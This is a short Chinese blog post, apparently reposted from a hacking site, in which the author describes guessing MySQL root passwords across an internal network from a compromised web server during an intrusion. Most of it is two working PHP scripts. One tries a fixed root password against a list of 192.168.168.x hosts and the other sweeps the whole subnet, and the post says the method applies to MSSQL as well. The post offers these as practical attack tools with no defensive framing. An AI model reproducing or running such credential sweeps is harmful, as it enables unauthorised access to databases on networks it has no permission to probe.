昨日渗透时 , 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。
这个是已知开了3306的。。
<?php$hostdb = array('192.168.168.10','192.168.168.20','192.168.168.20','192.168.168.40','192.168.168.50','192.168.168.60','192.168.168.70','192.168.168.80','192.168.168.90','192.168.168.100');$dbu = 'root';$dbp = '1qaz2wsx';foreach ($hostdb as $host) {if(@mysql_connect($host, $dbu, $dbp)) {echo $host.' - '.$dbu.' - '.$dbp.' ... OK<br>';}}echo 'done.';?>
举一反三,这是全段猜的。
<?php$ips = '192.168.168.';$dbu = 'root';$dbp = '1qaz2wsx';for ($i=1; $i<254; $i++) {if(@mysql_connect($ips.$i, $dbu, $dbp)) {echo $ips.$i.' - '.$dbu.' - '.$dbp.' ... OK<br>';}}echo 'done.';?>
本文来源于:凯里黑客http://www.0855.tv ,转载请注明来处,谢谢! www.jinghuazhi.com 整理 最新热门ASP.NET教程 最新ASP.NET C#咨询 最热门的技术讨论 尽在京华志